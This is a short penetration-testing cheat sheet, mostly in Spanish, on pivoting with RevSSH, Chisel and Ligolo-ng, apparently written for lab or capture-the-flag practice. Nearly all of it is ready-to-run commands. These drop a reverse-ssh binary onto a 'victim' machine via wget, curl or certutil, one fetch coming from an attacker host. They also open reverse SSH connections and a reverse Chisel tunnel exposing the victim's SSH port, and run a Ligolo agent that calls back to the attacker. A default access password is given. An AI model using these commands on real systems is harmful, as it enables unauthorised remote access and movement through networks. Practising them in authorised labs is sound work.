Pivoting

RevSSH

Attack machine:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l :4444

Victim Machine:

Linux

# Drop it via your preferred way, e.g.
curl http://10.10.14.9:8000/upx_reverse-sshx86 -o /dev/shm/upx_reverse-sshx86

/dev/shm/reverse-ssh -p 3333 USERATACANTE@IPATACANTE

Windows

# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 3333 USERATACANTE@IPATACANTE

En tu máquina

ssh -p 8888 127.0.0.1
letmeinbrudipls

Chisel

Atacante

chisel server --port 8000 --reverse

Víctima

Redirigirá el 22 de la víctima al 8888 del atacante:

chisel client <IP_SERVIDOR>:8000 R:8888:127.0.0.1:22

Ligolo-ng

Compilar dinámicamente:

go build -o agent /cmd/agent/main.go

Compilar estáticamente:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o agent -ldflags "-s -w" cmd/agent/main.go
sudo ip tuntap add user <Your Username> mode tun ligolo

sudo ip link set ligolo up
ligolo-proxy -selfcert

En la víctima

./agent -connect <Attack IP>:11601 -ignore-cert

Para listar las sesiones : session y elegimos una.

Podemos ejecutar ifconfig para ver las interfaces que tiene y en base a eso configuramos la interfaz en nuestra kali

Dentro de la sesión ejecutamos start

sudo ip route add 172.16.20.0/24 dev ligolo

Cuando se buguee la interfaz

sudo ip link delete ligolo

sudo ip tuntap add dev ligolo mode tun

sudo ip link set ligolo up